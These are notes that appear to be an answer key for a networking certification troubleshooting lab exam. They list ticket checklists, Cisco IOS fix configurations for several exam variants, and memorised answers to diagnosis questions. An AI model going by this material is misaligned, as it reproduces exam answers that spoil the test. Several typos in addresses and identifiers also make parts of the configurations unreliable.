
Question/Ticket Troubleshooting Steps
A. PC101 must get an IP Address
3 MAC addresses must match
DHCP, Ports Security, PC itself

B. check OSPF between SW1 and SW2


VLAN database, allowed in the trunk
OSPF neighbors

C. Check the access List BT5

Q1: Layer 2

A. R17 must show "LCP Open", PPP authentication is no problem


show int s4/0, if "LCP is closing" or "LCP is Requesting" PPP auth is failing

B. R17 can get an IP address and can get a default route


check the DHCP pool name and configuration

C. Ensure that R11 can ping R17

Q2: PPP
D. check if VTY has a problem

R11 can telnet to R17, via R12

A. Check the OSPF neighbors

B. Check the route mask - it should be /29

C. Check the load balancing

R1 > 123.45.65.48/29 must be load balanced


R1>R3|R5>R21|R22

Q3: OSPF

A. Check the EIGRP k-Values, 1 1 1 1 1

B. Check the EIGRP Neighbor


k-Values and passive interfaces

C. Check distribute list on R13 and R14

D. Check the Off-set list on R12


Q4: EIGRP
R11 > R14 loopback
R11> R12|R13 > R14

A. Check the BGP neighbors

B. Check the metrics on R4 and R6

C. Check R21 and R22 on the metric or local preference

D. Check the LDP neighbor

Note: if you find that there is no problem on routing, but you cannot run the traceroute, then LDP has an issue

R12>R3 (loopback)
R12>R4>R2>R1>R3
R12>R21 (loopback)
Q5: BGP R12>R6>R2>R1>R3>R21
R12>8.8.8.8 (traceroute 8.8.8.8 probe 2)
R12>R4|R6>R2>R1>R3>R21>R26
R12>192.1.1.1 (traceroute 194.1.1.1 probe 2)
R12>R4|R6>R2>R1>R5>R22>R26
A. Check the BGP neighbor

B. Check the next-hop

C. Check network statements in R25


sh bgp ipv6 unicast summ

Q6: IPv6
Phone > Server4

A. Check DMVPN on R15

R15 is the hub


R17,R18,19 are the spokes
R19 and R20 are EIGRP neighbors

Server2 > PC107 (behind R17)


PCs to Server 2
PC to PC

Q7: DMVPN

A. Check BGP neighbor

B. Check VRF RT

C. Make sure default route can be sent to AS 65101 and 65102

D. Make sure routes of AS65101 and 65102 can be sent to R7 and R8

E. Check the NAT and default route next hop

F. Check network statement


network 125.45.67.20 mask 255.255.255.252

G. check the backup path

BancoBank_ToHub
BancoBank_ToSpoke

R7 and R18 are configured as backbone for VPN Network


R9/PC104, R10/PC106 are VPN Clients

PC106 > trace 8.8.8.8


PC106>SW4>R10>R6>R2>R1>R3>R7>R3>R21>R26

PC104>PC106
PC104>SW3>R9>R5>R1>R3>R7>R3>R1>R2>R6>R10>SW4>PC106

Q8: MPLS VPN


A. R24 can ping 125.45.67.22

B. Check the IPSEC VPN

C. Check OSPF neighbor

PC110 can access the Server 1


Q9: DMVPN
NAT

A. NAS can get an IP Address

B. Check the NAT on R23

R21 must be able to telnet to NAS


Q10: NAT
BT1

SW2
vlan 12
int e0/0
sw tr al vl add 12
int e1/0
sw ac vl 100
int vlan 100
ip add 172.16.100.1 255.255.255.0

PC101
int e1/0
shut
no shut

R17
int s4/0
ppp chap hostname UberMarket_spoke_R17
ppp ipcp route default
no ppp auth chap callout

R12
ip local pool SPOKE1 145.67.89.22

R3
router ospf 12345
no area 1 range 134.56.78.0 255.255.255.0

R5
router ospf 12345
no max-metric router-lsa

R21
int e2/0
no ip ospf cost 1

R13
router eigrp 145
metric weights 0 1 1 1 1 1
ip access-list standard 10
no 10
int e1/0
no delay 1000

R14
no ip prefix-list DENY seq 5 deny 145.14.14.14/32

R12
ip access-list standard 1
5 deny 145.14.14.14
int e1/0
no bandwidth 1000

 1x300 2x50
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
route-map MED permit 10
match ip address prefix-list 194
set metric 300
clear ip bgp * soft

R22
router bgp 12345
address-family ipv4
neighbor PEER next-hop-self
clear ip bgp * soft

R12
router bgp 12345
maximum-paths 2

R6
route-map MED permit 20
match ip address prefix-list 134
set metric 50
clear ip bgp * soft

R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft

R25
router bgp 65101
address-family ipv6
network 2001:CC1E:BEEF:25::/64
route-map NEXT-HOP permit 10
no set ipv6 next-hop 2001:3::3
set ipv6 next-hop 2001:CC1E:BEEF:2225::18
clear ip bgp * soft

R22
router bgp 12345
address-family ipv6
neighbor 123.1.2.18 route-map NEXT-HOP out
clear ip bgp * soft

R15
int tun0
ip nhrp redirect
no ip split-horizon eigrp 200
router eigrp 200
no redistribute connected metric 1 1 1 1 1
R18
int tun0
ip nhrp map multicast 145.67.89.10

ip nhrp nhs 215.0.0.1


ip nhrp shortcut

R19
int tun0
no ip nhrp auth uSER789
ip nhrp auth USER789
ip nhrp shortcut
router eigrp 200
no eigrp stub connected summary
ip access-list extended DMVPN
permit esp any any

R20
router eigrp 200
no passive-interface e0/0
passive-interface e1/0

R7
router bgp 65100
neighbor 123.45.67.21 default-originate
! Missing at preconfig
redistribute static metric 1
no ip nat source list 100 int e0/0.125 overload
ip nat inside source list 100 int e0/0.125 overload
R8
router bgp 65100
neighbor 123.45.67.25 default-originate
! Missing at preconfig
redistribute static metric 1

R3
ip vrf BancoBank_ToHub
route-target import 65100:102
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252

R9
router ospf 65101
default-information originate
R7
no crypto isakmp key CCIE address 192.168.1.2
crypto isakmp key CCIE address 0.0.0.0
int tun10
shut / no shut

R24
crypto ipsec nat-transparency udp-encapsulation
no crypto transform-set CCIEXFORM esp-3des esp-md5-hmac
crypto transform-set CCIEXFORM esp-aes
mode transport
int tun10
shut / no shut

R23
ip dns server
no access-list 194 permit ip host 192.168.1.0 any
access-list 194 permit ip 192.168.1.0 0.0.0.255 any
no ip nat outside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable

R24
int e0/0
no ip add 192.168.1.200 255.255.255.0 secondary
NAS
ip domain lookup
BT2

SW2
int e1/0
sw ac vl 100
shut
no switchport port-security mac-address aabb.cc00.2155
switchport port-security mac-address aabb.cc00.2111
no shut
router ospf 65100
no passive-interface vlan12

R12
int s4/0
no peer default ip address pool SPOKE11
peer default ip address pool SPOKE1
shut / no shut

R5
router ospf 12345
no max-metric router-lsa

R22
int e2/0
ip add 134.56.78.49 255.255.255.248
router ospf 12345
no passive-interface e0/0

R13
router eigrp 145
metric weights 0 1 1 1 1 1

R14
no ip prefix-list DENY seq 5 deny 145.14.14.14/32

R12
ip access-list standard 1
5 deny 145.14.14.14

 1x50
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
router bgp 12345
network 134.21.21.21 mask 255.255.255.255

R5
router bgp 12345
address-family ipv4
neighbor 123.4.4.4 act
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft

R25
router bgp 65101
address-family ipv6
no network 2001:CC1E:BEEF:25::1/128
network 2001:CC1E:BEEF:25::/64

R22
route-map NEXTHOP permit 10
no set ipv6 next-hop 2001:CC2E:BEEF:2225::17
set ipv6 next-hop 2001:CC1E:BEEF:2225::17

R15
int tun0
ip nhrp redirect
no ip host user1spoke2 145.67.89.30
ip host user1spoke2 145.18.18.18
R18
int tun0
ip nhrp map multicast 145.67.89.10

R19
ip access-list extended DMVPN
permit esp any any

R7
router bgp 65100
default-information originate
no ip route 0.0.0.0 0.0.0.0 124.45.67.21
ip route 0.0.0.0 0.0.0.0 125.45.67.21
int e0/0.125
ip nat outside
R8
router bgp 65100
no neighbor 124.45.67.25 shut
default-information originate
int e0/0.123
ip nat inside

R3
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252

R4
int e2/0
ip ospf cost 1000

R6
ip vrf BancBank
route-target import 65100:100
int e2/0
ip ospf cost 1000
R7
no crypto isakmp key CCIE address 192.168.1.2
crypto isakmp key CCIE address 0.0.0.0
crypto isakmp policy 10
group 14
int tun10
shut / no shut

R24
crypto isakmp nat-transparency udp-encapsulation
router ospf 65100
network 172.247.247.0 0.0.0.3 area 3
int tun10
shut / no shut

R23
no ip nat outside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip dhcp pool NAS
no client-identifier aabb.cc00.0000
client-identifier 01aa.bbcc.0000.00
ip name-server 8.8.8.8

R24
int e0/0
no ip add 192.168.1.200 255.255.255.0 secondary

R21
ip domain lookup
NAS
ip http server
BT3

SW2
int vlan100
ip add 172.16.100.1 255.255.255.0
ip helper-address 172.8.8.8
int e1/0
shut / no shut
vlan 12

SW1
router ospf 65100
no passive-interface vlan12

R8
ip dhcp pool HOST1
default-router 172.16.100.1

PC101
int e0/0
mac-address aabb.cc00.2111
shut / no shut

R17
int s4/0
ppp ipcp route default
ppp chap password ccie
shut / no shut
line vty 0 4
transport input telnet

R12
no ip local pool SPOKE1 145.67.89.222
ip local pool SPOKE1 145.67.89.22
int s4/0
shut / no shut

R3
int e2/0
no ip ospf hello-interval 11
router ospf 12345
no area 1 range 134.56.78.0 255.255.255.0

R1
int e1/0
no ip ospf cost 1

R21
router ospf 12345
no passive-interface e0/0
no max-metric router-lsa

R22
int e0/0
no ip ospf network point-to-point
int e2/0
ip add 134.56.78.49 255.255.255.248

R13
int e0/0
ip add 145.67.89.6 255.255.255.252

R14
no ip prefix-list DENY seq 5 deny 145.14.14.14/32
router eigrp 145
metric weights 0 1 1 1 1 1
no passive-interface e1/0

R12
ip access-list standard 1
5 deny 145.14.14.14

R11
int eth1/0
no ip auth mode eigrp 145 md5

 2x50
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
clear ip bgp * soft
router bgp 12345
neighbor PEER next-hop-self

R22
router bgp 12345
neighbor PEER update-source l0

R5
router bgp 12345
address-family ipv4
neighbor 123.4.4.4 act

R12
router bgp 14567
maximum-paths 2
no neighbor 123.45.67.45 shut

R2
int e1/0
mpls ip
int e2/0
mpls ip

R6
route-map MED permit 20
match ip address prefix-list 134
set metric 50
clear ip bgp * soft

R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft

R25
route-map NEXTHOP permit 10
no set ipv6 next-hop 2001:3::3
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
router bgp 65101
address-family ipv6
neighbor 123.1.2.17 route-map NEXT-HOP out

R22
route-map NEXTHOP permit 10
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
router bgp 12345
address-family ipv6
neighbor 123.1.2.18 route-map NEXT-HOP out
no neighbor 123.1.2.18 shut
clear ip bgp * soft

R15
router eigrp 200
no redistribute connected metric 1 1 1 1 1
int tun0
ip nhrp redirect
R17
int tun0
tunnel protection ipsec profile DMVPNPROFILE

R19
router eigrp 200
no eigrp stub connected summary
ip access-list extended DMVPN
permit esp any any
int tun0
ip nhrp nhs 215.0.0.1

R20
router eigrp 200
no passive-interface default
network 145.67.89.81 0.0.0.0

R7
router bgp 65100
neighbor 124.45.67.21 remote-as 12345
default-information originate
int e0/0.125
ip nat outside
no ip nat outside source list 100 interface e0/0.125 overload
ip nat inside source list 100 interface e0/0.125 overload
int e0/0.123
ip nat inside
R8
access-list 100 permit ip 172.16.201.0 0.0.0.255 any
int e0/0.125
ip nat outside
router bgp 65100
default-information originate

R3
router bgp 12345
address-family vpnv4
neighbor 123.5.5.5 act
ip vrf BancoBank_ToHub
route-target import 65100:101
route-target import 65100:102

R4
int e2/0
ip ospf cost 1000

R6
int e2/0
ip ospf cost 1000

R9
router ospf 65101
default-information originate

R5
int s4/0
ip vrf forwarding BancoBank
ip add 123.65.1.29 255.255.255.252
R7
int tun10
shut / no shut

R24
crypto ipsec nat-transparency udp-encapsulation
no crypto isakmp key CC1E address 0.0.0.0
crypto isakmp key CCIE address 0.0.0.0
router ospf 65100
no passive-interface tun10
int tun10
shut / no shut

R21 (related to Q10)


int s4/0
ip add 134.56.78.9 255.255.255.252

R23
no ip nat source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 int s4/0 8008
ip dns server
ip name-server 8.8.8.8

R21
ip domain lookup
ip name-server 8.8.8.8
int s4/0
ip add 134.56.78.9 255.255.255.252
NAS
int e0/0
ip add dhcp client-id e0/0
BT4

SW2
int e0/0
sw tr al vl add 12
int vlan 100
ip helper-add 172.8.8.8

R8
no ip host SERVER1 172.16.200.1
ip host SERVER 172.16.200.200
ip dhcp pool HOST1
client-identifier 01aa.bbcc0021.11

R17
int s4/0
ppp chap password CCIE
ppp ipcp route default
ip access-list standard 1
no 10

R12
int s4/0
peer default ip address pool SPOKE1
shut / no shut

R3
router ospf 12345
network 134.56.78.37 0.0.0.0 area 1
int eth0/0
no ip ospf network point-to-point

R22
router ospf 12345
no network 134.56.78.41 0.0.0.0 area 1
network 134.56.78.42 0.0.0.0 area 1
int eth2/0
no ip ospf cost 1

R13
router eigrp 145
metric weights 0 1 1 1 1 1

R14
router eigrp 145
no passive-interface default

 1x50
R21
router bgp 12345
no neighbor PEER route-map LP in
neighbor PEER route-map LP out

R22
router bgp 12345
address-family ipv4
neighbor PEER next-hop-self

R3
ip access-list extended 100
no 10
router bgp 12345
no neighbor 123.6.6.6 password cisco
no neighbor 123.4.4.4 shutdown

R12
router bgp 14567
maximum-paths 2
R4
route-map MED permit 10
match ip address prefix-list 123
set metric 50
clear ip bgp * soft

R22
route-map NEXT-HOP permit 10
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
router bgp 12345
address-family ipv6
neighbor 123.1.2.18 route-map NEXT-HOP out
ip access-list extended 100
no 20

R15
int tun0
ip nhrp redirect
no ip host user1SPOKE 145.18.18.18
R18
router eigrp 200
no eigrp stub receive-only

R19
ip access-list extended DMVPN
permit esp any any
int tun0
ip nhrp nhs 215.0.0.1
no tunnel source e0/0
tunnel source s4/0

R20
int e0/1
ip add 200.100.0.81 255.255.255.252

PC109
no ip domain timeout 1000

R7
int e0/0.124
no ip nat outside
ip nat inside
int e0/0.125
no ip nat inside
ip nat outside
router bgp 65100
default-information originate
no ip route 0.0.0.0 0.0.0.0 124.45.67.21
ip route 0.0.0.0 0.0.0.0 125.45.67.21
R3
router bgp 12345
no neighbor 123.4.4.4 shutdown

R4
ip vrf BancoBank_ToHub
route-target import 65100:101
R7
int tun10
tunnel source e0/0.125

R24
int tun10
tunnel protection ipsec profile DMVPNPROFILE
router ospf 65100
no network 172.247.247.4 0.0.0.3 area 3
network 172.247.247.0 0.0.0.3 area 3

R21
int s4/0
no peer default ip address pool R21
peer default ip address pool R23
shut / no shut

R23
ip dhcp pool NAS
default-router 192.168.1.1

R24
int e0/0
no ip add 192.168.1.200 255.255.255.0 secondary
NAS
int e0/0
mac-address aabb.cc00.0000
shut / no shut
BT5

SW2
ip access-list extended 100
no 10
access-list 100 deny ip any host 172.16.100.200
access-list 100 permit ip any any
int vlan 100
ip access-group 100 out

SW1
router ospf 65100
network 172.16.200.0 0.0.0.255 area 0
ip access-list standard 10
no 20
20 permit 17.16.200.0 0.0.0.255
access-list 10 permit 0.0.0.0
access-list 10 permit 172.16.200.0
int vlan200
ip access-group 10 in

R17
int s4/0
encapsulation ppp
ppp chap hostname UberMarket_spoke_R17
ppp chap password CCIE
ppp ipcp route default

R12
no ip prefix-list DENY seq 5 deny 145.67.89.20/30 le 32
clear ip eigrp neighbors

R3
ip access-list extended 100
no 10
access-list 100 deny ospf any any
access-list 100 permit ip any any
int e2/0
ip access-group 100 in

R21
router ospf 12345
router-id 134.21.21.21
clear ip ospf process [yes]

R22
router ospf 12345
no passive-interface e0/0
router-id 134.22.22.22
clear ip ospf process [yes]

R13
router eigrp 145
metric weights 0 1 1 1 1 1

R14
router eigrp 145
no passive-interface e1/0

R12
router eigrp 145
no passive-interface e1/0

 1x10
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
router bgp 12345
no neighbor 134.67.78.6 route-map LP out
neighbor 134.56.78.6 route-map LP in
clear ip bgp * soft

R5
route-map NEXT-HOP permit 10
no set ip next-hop 123.45.67.45
clear ip bgp * soft

R2
int e0/0
mpls ip

R6
ip prefix-list DENY seq 3 permit 134.21.21.21/32
clear ip bgp * soft

R4
route-map MED permit 10
match ip address prefix-list 123
set metric 10
ip prefix-list DENY seq 3 permit 123.3.3.3/32
clear ip bgp * soft

R22
ip access-list extended 100
5 permit tcp any any eq 179
[10 deny tcp any any]
int s4/0
ip access-group 100 in
ip access-group 100 out

R15
int tun0
ip nhrp redirect
R17
int tun0
ip nhrp shortcut

R18
int tun0
ip nhrp shortcut

R19
int tun0
ip nhrp shortcut

R14
access-list 100 permit esp any any

PC109
ip domain lookup

R7
router bgp 65100
default-information originate
R8
int eth0/0.124
ip nat inside

R4
int e2/0
ip ospf cost 1000

R6
router bgp 12345
address-family vpnv4
neighbor 123.3.3.3 act
int e2/0
ip ospf cost 1000

R9
ip dhcp pool PC104
default-router 172.16.101.9
router bgp 65101
redistribute ospf 65101 match internal external 1 external 2

SW3
router ospf 65101
network 172.16.101.9 0.0.0.0 area 0

PC104
int e0/0
ip address dhcp client-id e0/0

R21
access-list 123 permit ip any any

R23
ip dhcp pool NAS
client-identifier 01aa.bbcc.0030.00
ip domain lookup
NAS
int e0/0
ip add dhcp client-id e0/0
Test1

SW1
router ospf 65100
network 172.16.200.0 0.0.0.255 area 0
ip access-list standard 10
no 20 [permit 172.16.200.0]
20 permit 172.16.200.0 0.0.0.255

R17
int s4/0
encapsulation ppp
ppp chap hostname UberMarket_spoke_R17
ppp chap password CCIE
ppp ipcp route default
R21
router ospf 12345
router-id 134.21.21.21
clear ip ospf process [yes]

R13
router eigrp 145
metric weights 0 1 1 1 1 1
R12
router eigrp 145
no passive-interface e1/0

 1x10
R2
int e0/0
mpls ip

R5
route-map NEXT-HOP permit 10
no set ip next-hop 123.45.67.45
clear ip bgp * soft
R6
ip prefix-list DENY seq 3 permit 134.21.21.21/32
clear ip bgp * soft

R4
route-map MED permit 10
match ip address prefix-list 123
set metric 10
ip prefix-list DENY seq 3 permit 123.3.3.3/32
clear ip bgp * soft

R22
ip access-list extended 100
5 permit tcp any any eq 179
[10 deny tcp any any]

R15
int tun0
ip nhrp redirect
R19
int tun0
ip nhrp shortcut

R14
access-list 100 permit esp any any

PC109
ip domain lookup

R7
router bgp 65100
default-information originate
R4
int e2/0
ip ospf cost 1000

R6
int e2/0
ip ospf cost 1000

R9
ip dhcp pool PC104
default-router 172.16.101.9

SW3
router ospf 65101
network 172.16.101.9 0.0.0.0 area 0

PC104
int e0/0
ip address dhcp client-id e0/0

R21
access-list 123 permit ip any any

R23
ip dhcp pool NAS
client-identifier 01aa.bcc.0030.00
ip domain lookup
NAS
int e0/0
ip address dhcp client-id e0/0
Test2

SW2
int vlan100
ip add 172.16.100.1 255.255.255.0

R17
int s4/0
encapsulation ppp
ppp ipcp route default

R12
int s4/0
no peer default ip address pool user1spoke1
peer default ip address dhcp-pool user1spoke1

R3
router ospf 12345
no max-metric router-lsa
R12
router eigrp 145
no passive-interface e1/0

R1
int e0/0
no ip ospf network point-to-point

R5
router bgp 12345
address-family ipv4
neighbor IBGP route-reflector-client
R22
router bgp 12345
address-family ipv6
neighbor 2001:CC1E:BEEF:2225::18 act

R15
int tun0
ip nhrp redirect
R18
int tun0
ip nhrp nhs 215.0.0.1
R3
int e1/0.123
ip vrf forwarding BancoBank_ToSpoke
ip add 123.45.67.21 255.255.255.252

R4
int e2/0
ip ospf cost 1000

R6
int e2/0
ip ospf cost 1000

R9
router ospf 65101
default-information originate
R24
int tun10
no ip ospf network broadcast

R23
no ip nat source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
V1

SW2
vlan 12
int e1/0
sw ac vl 100
router ospf 65100
no passive-interface vlan12

R17
int s4/0
ppp ipcp route default
no ppp authentication chap callout

R12
router bgp 14567
network 145.6.89.20 mask 255.255.255.252

R5
router ospf 12345
no max-metric router-lsa

R21
int e2/0
no ip ospf cost 1

R13
int e1/0
no delay 1000
R12
int e1/0
no bandwidth 1000

 1x100
R21
ip prefix-list 194 permit 194.1.1.0/24
router bgp 12345
no neighbor 134.56.78.6 route-map MED out
neighbor 134.56.78.6 route-map MED in
clear ip bgp * soft

R12
router bgp 14567
maximum-paths 2
R6
route-map MED permit 10
match ip address prefix-list 194
set metric 100
clear ip bgp * soft

R25
route-map NEXT-HOP permit 10
no set ipv6 next-hop 2001:3::3
set ipv6 next-hop 2001:CC1E:BEEF:2225::18
clear ip bgp * soft

R22
route-map NEXT-HOP permit 10
no set ipv6 next-hop 2001:2::2
set ipv6 next-hop 2001:CC1E:BEEF:2225::17
clear ip bgp * soft

R15
router eigrp 200
no redistribute connected metric 1 1 1 1 1
int tun0
ip nhrp redirect
no ip split-horizon eigrp 200
R18
int tun0
ip nhrp shortcut
no ip nhrp map 145.67.89.10 215.0.0.1
ip nhrp map 215.0.0.1 145.67.89.10
ip nhrp map multicast 145.67.89.10

R19
int tun0
ip nhrp shortcut
no ip nhrp map 145.67.89.10 215.0.0.1
ip nhrp map 215.0.0.1 145.67.89.10

R7
router bgp 65100
neighbor 123.45.67.21 default-originate
no ip nat source list 100 int e0/0.125 overload
ip nat inside source list 100 int e0/0.125 overload
R8
router bgp 65100
neighbor 123.45.67.25 default-originate

R3
ip vrf BancoBank_ToHub
route-target import 65100:101
route-target import 65100:102
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252

R4
ip vrf BancoBank_ToHub
route-target import 65100:101
route-target import 65100:102

R9
router ospf 65101
default-information originate

R10
router ospf 65102
default-information originate
R7
crypto isakmp policy 10
group 14
router ospf 65100
network 172.247.247.1 0.0.0.0 area 3

R24
crypto ipsec nat-transparency udp-encapsulation

R23
no ip nat source static tcp 192.168.1.200 23 interface s4/0 2323
ip nat inside source static tcp 192.168.1.200 23 int s4/0 2323
no ip nat source static tcp 192.168.1.2000 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
NAS
int e0/0
mac-address aabb.cc00.0000
shut / no shut
R6#sh run | s vrf
ip vrf BancBank
rd 65100:102
route-target export 65100:102
route-target import 65100:100

R5#sh run | s vrf
ip vrf BancBank
rd 65100:101
route-target export 65100:101
route-target import 65100:100

R4#sh run | s vrf
ip vrf BancoBank_ToHub
rd 65100:103
route-target import 65100:102
route-target import 65100:101
ip vrf BancoBank_ToSpoke
rd 65100:100
route-target export 65100:100

R3#sh run | s vrf
ip vrf BancoBank_ToHub
rd 65100:103
route-target import 65100:102
route-target import 65100:101
ip vrf BancoBank_ToSpoke
rd 65100:100
route-target export 65100:100

Question/Ticket Troubleshooting Steps
A. Check VLAN Access Map

B. Check HSRP

C. Check OSPF, the 4x IP Addresses

Q1: Layer 1

User4 (VLAN2000) to R40 Lo0 in Large Office

A. Check the BGP neighbor, sh ip bgp

B. Check SW111 route, and to VLAN 2001

C. On R15, configure next-hop-s

Server 1 needs to ping 8.8.8.8


Q2: BGP

A. Check the BGP neighbor

B. Check the MED and Access-list

C. OSPF Load Balance


use - sh ip ospf interface, sh ip route ospf

VLANs between DC1 and DC2 need to be load balanced

Q3: BGP2
note:
Access list 1 - for odd
Access list 2 - for even

Origin IGP is preferred over Origin Incomplete

A. Check local pref

Q4: BGP2

A. Check BGP Neighbor, DMVPN config

B. Check OSPF Configuration

R14 is the hub, R14 and R51 are the Spokes

Q5: DMVPN

A. Check default route on SW111


OE2 ::/0 [110/1], tag 65001

Q6: IPv6
B. Check OSPFv3 on SW111

C. Check R15 can send the segment VLAN2001

User1 should ping ISP IPv6 address

A. Check OSPF neighbor


LDP should be up

B. Check BGP VPNV4 neigh

C. Check the RT (route target)


Q7: MPLS
D. Check LDP neigh

A. Check SW300/301

B. Check VLAN 2000


ip dhcp relay information trusted

Q8: Security

A. Check the tunnel source, DMVPN config

Q9: DMVPN

A. Check NAT (compare R24 and R25)

Q10: NAT
BT2
SW400
ip access-list extended 111
no 10
no 30
router ospf 65004
no passive-interface vlan2000

SW401
ip access-list extended 111
no 10
no 30

R40
ip dhcp pool xx
lease 0 2 1

R41
ip dhcp pool xx
lease 0 2 1

SW110
int e2/0
no ip ospf cost 100

SW111
int e2/0
no ip ospf cost 100

R12
clear ip bgp * soft

R22
route-map MED permit 20
match ip address 2
set metric 1
set origin igp
clear ip bgp * soft

R23
route-map MED permit 20
match ip address 2
set metric 1
set origin incomplete
clear ip bgp * soft
int l0
no ip ospf 10 area 0
ip ospf 1 area 0

R20
router bgp 65002
neighbor DC2 route-map LP out
clear ip bgp * soft

R21
router bgp 65002
neighbor DC2 route-map LP out
clear ip bgp * soft

R60
int tun0
ip add 10.100.0.60 255.255.255.0

R15
router bgp 65001
address-family ipv6
network 2001:CC:1E:8BAD:2001::/104

SW111
int vlan2001
ospfv3 65001 ipv6 area 0

R5
int e0/1
no ip ospf 10 area 0
ip ospf 1 area 0

R10
router ospf 65001
distance ospf external 210

SW300/SW301
int vlan2000
ip dhcp relay information trusted

SW300
router ospf 65003
no passive-interface vlan2000

SW310
ip dhcp snooping information option
port-channel2
ip arp inspection validate
port-channel1
ip arp inspection validate
ip dhcp pool xx
lease 0 2 1

User3
int e0/0
shut / no shut

R71
int tun0
ip ospf network point-to-point

R24/25
ip nat outside source static 201.99.70.2 201.99.25.70
3.1
SW400
vlan access-map ATTACK 20
action forward

SW401
vlan access-map ATTACK 20
action forward

User4
int e0/0
shut / no shut

SW111
int vlan2001
ip ospf 65001 area 0

R14
router bgp 65001
neighbor DC1 next-hop-self
clear ip bgp * soft

SW101
int e1/2
no ip ospf cost 1

R12
no access-list 1 permit 10.2.1.0 0.0.254.255
no access-list 2 permit 10.2.0.0 0.0.254.255
access-list 1 permit 10.1.1.0 0.0.254.255
access-list 2 permit 10.1.0.0 0.0.254.255
clear ip bgp * soft

R13
no access-list 1 permit 10.2.1.0 0.0.254.255
no access-list 2 permit 10.2.0.0 0.0.254.255
access-list 1 permit 10.1.1.0 0.0.254.255
access-list 2 permit 10.1.0.0 0.0.254.255
clear ip bgp * soft

R21
route-map LP permit 10
match ip address prefix-list LP
set local-preference 200
clear ip bgp * soft

R14
int tun0
ip ospf network point-to-multipoint

R51
int tun0
ip ospf network point-to-multipoint

R60
int tun0
ip ospf network point-to-multipoint

R15
router bgp 65001
address-family ipv6
network 2001:CC:1E:8BAD:2001::/104

R5
ip vrf GLOBALISP
no route-target export 65005:5
route-target export 65003:3

R1
int lo0
ip ospf 10000 area 0

R3
int e0/1
mpls ip

SW300/SW301
int vlan 2000
ip dhcp relay information trusted

User3
int e0/0
shut / no shut

R71
int tun0
tunnel key 10000

R25
no ip nat inside source static tcp 201.99.25.2 23 10.2.200.1 23
ip nat inside source static tcp 10.2.200.1 23 201.99.25.2 23
ip nat outside source static 201.99.70.2 200.8.8.8
(copy from R24 it is correct)
Tickets H1 Diag
DIAGs come as a set. They don't come with mixed questionnaires.

Ticket 1

Question 1 Which one of the provided materials best helps you determine the fault?
Device SW3; Command line: show ip int brief
Question 2 Indicate which information, collected on which device, you require from the helpdesk in order to confirm your suspicion
Collect on device: Host_1
Required information: what's the MAC address of E0/0

Ticket 2
Question 1 After considering all information provided, point and click on the device that is responsible for causing the reported symptom.
R15
Question 2 Recommend a possible solution to this issue as well as on which device it must be configured:
Exclude the IP prefix of E0/0 into EIGRP

Ticket 3

Question 1 Drag and Drop


1. R1 looks up its RIB and selects int e2/0 as the egress interface
2. R1 translates the source IP Address to its interface Lo11
3. R1 transmits the packet via interface e2/0
4. Packets are received by R3 and forwarded to the destination
5. The destination replies with an ICMP echo reply
6. The echo Reply is routed via R2
7. R2 transmits the echo reply to R1
8. Unicast RPF on R1 drops the echo reply

Question 2 After considering all information provided, identify the root cause of the issue:
Asymmetric routing with Unicast RPF.
H1+ Diag

Which one of the provided materials best helps you determine the fault?
Device SW3; Command line: show spanning-tree summary
Indicate which information, collected on which device, you require from the helpdesk in order to confirm your suspicion
Collect on device: SW3
Required information: show vtp password
After considering all information provided, point and click on the device that is responsible for causing the reported symptom.
R16

Recommend a possible solution to this issue as well as on which device it must be configured:
Increase the mask Length of R16 interface E0/0

Drag and Drop


1. R1 determines if there is a single path to the destination based on per destination
2. R1 determines R3 as adjacency via F2/0
3. R1 checks its ACL and decides (destination) IP Address needs to be translated.
4. R1 sends the packets via F2/0
5. R3 receives the packet, checks its own ACL and determines R2 as destination
6. R2 receives the packet, checks its ACL and determines R1 as destination
7. R2 drops the packet
8. URPF fail

After considering all information provided, identify the root cause of the issue:
strict unicast RPF dropping packets and per-destination load-balancing
How to differentiate the H3 DIAG and H3+ DIAG

If you find SW3 'show ip interface brief E0/0' is down, this set is H1 DIAG
If you find SW3 show spanning summary only has vlan 1, this set is H1+ DIAG

If you find E0/0 of R16 mask length is /30, this one is H1 DIAG
If you find E0/0 of R16 mask length is /29, this one is H1+ DIAG
You can just look at the last question's answer
H1 DIAG is unicast RPF
H1+ DIAG is strict + per-destination
Tickets H2 Diag
DIAGs come as a set. They don't come with mixed questionnaires.

Ticket 1

Key word for PCAP file | icmpv6.type==134

Question 1 How to fix the problem fast

Configure CE2 with highest HSRPV6 priority
Question 2 What is the root cause of the problem caused by the current? Which device?
Wrong HSRP configuration
CE1
Question 3 Choose the first frame ID that demonstrates your doubt
active: #193
//RA FE80:666

Ticket 2
Question 1 What is the issue?
R3 has no route to RP
Question 2 What will you ask your engineer?
Why is 10.4.1.0/24 not in R3's RIB?
Question 3 How to deal with the current issue temporarily?
R3(config)#ip route 10.4.1.1 255.255.255.255 10.0.0.17
//note: 10.0.0.17 is the address of R4, if you find next-hop is wrong, you can choose
R3(config)#ip mroute 10.4.1.1 255.255.255.255 10.0.0.17
H2+ Diag

How to fix the problem fast

Shutdown interface of CE1 E0/0
What is the root cause of the problem caused by the current? Which device?
High preference gateway information is sent out
Unknown device in CE's LAN
Choose the first frame ID that demonstrates your doubt
